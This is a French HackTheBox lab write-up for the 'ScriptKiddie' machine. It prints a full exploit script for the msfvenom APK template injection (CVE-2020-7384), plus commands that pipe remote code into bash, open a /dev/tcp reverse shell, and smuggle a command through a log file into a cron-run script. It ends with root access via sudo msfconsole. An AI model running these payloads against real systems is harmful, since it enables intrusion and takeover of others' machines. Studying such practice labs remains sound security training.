ScriptKiddie HackTheBox (WriteUp)

Skills:

Msfvenom Exploitation [CVE-2020-7384] [RCE]
Abusing Logs + Cron Job [Command Injection / User Pivoting]
Abusing Sudoers Privilege [Msfconsole Privilege Escalation]

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.10.226 -oG allPorts

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,5000 10.10.10.226 -oN targeted

Port 5000 - Msfvenom APK TCI Exploitation

Nous identifions un service vulnérable exécuté sur le port 5000.

Nous effectuons une recherche de vulnérabilités associées :

searchsploit -m multiple/local/49491.py

Nous trouvons une injection potentielle via APK.

Script d'exploit (msfvenom-exploit.py)

python3 msfvenom-exploit.py

#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode

# Change me
payload = 'ping 10.10.14.50'

# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | /bin/bash #"

print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()

tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"

# Touch empty_file
open(empty_file, "w").close()

# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])
# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
                       "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])

# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
                       "-storepass", storepass, "-keypass", keypass, apk_file, key_alias])

print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")

Le script génère un fichier temporaire contenant un APK malveillant.

Analyse des paquets ICMP

Nous surveillons l'activité réseau pour détecter un retour :

tcpdump -i tun0 icmp -n

Exploitation RCE avec Msfvenom

Nous modifions le payload pour établir une connexion inverse :

# Change me
payload = 'curl 10.10.14.50 | bash'

Nous créons un fichier index.html contenant :

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.50/443 0>&1

Nous lançons un serveur HTTP :

python3 -m http.server 80

Puis, nous écoutons la connexion sur le port 443 :

nc -nlvp 443

Une fois l'APK envoyé et exécuté sur la machine cible, nous obtenons un shell distant.

Nous améliorons notre terminal pour une meilleure interactivité :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Flag user.txt :)

Élévation de Privilèges

Pivoting utilisateur pwn

Nous trouvons un script scanlosers dans le répertoire de l'utilisateur pwn:

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Ce script traite des logs et exécute nmap, ce qui pourrait être exploité pour une élévation de privilèges.

L'idée est d'injecter une commande en profitant du filtrage par le troisième mot. On peut insérer un point-virgule ; suivi d'une commande malveillante, comme un curl vers un serveur contrôlé par l'attaquant.

echo "[2024-03-05 20:20:20] 127.0.0.1; curl http://10.10.14.50 #" > /home/kid/logs/hackers

Cela entraîne une requête HTTP vers notre serveur.

On écoute sur notre machine avec :

nc -nlvp 443

Ensuite, on injecte une commande pour obtenir un shell distant :

echo "[2024-03-05 20:20:20] 127.0.0.1; curl http://10.10.14.50 | bash #" > /home/kid/logs/hackers

Sudo - Metasploit

On vérifie les permissions sudo :

sudo -l

On découvre que nous pouvons exécuter Metasploit en tant que root :

sudo /opt/metasploit-framework-6.0.9/msfconsole

Dans msfconsole, nous ouvrons une shell Ruby interactive :

irb

Puis nous exécutons un shell Bash :

system("/bin/bash")

Nous sommes maintenant root et pouvons lire le flag root.txt ! 🎉

Flag root.txt :)

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?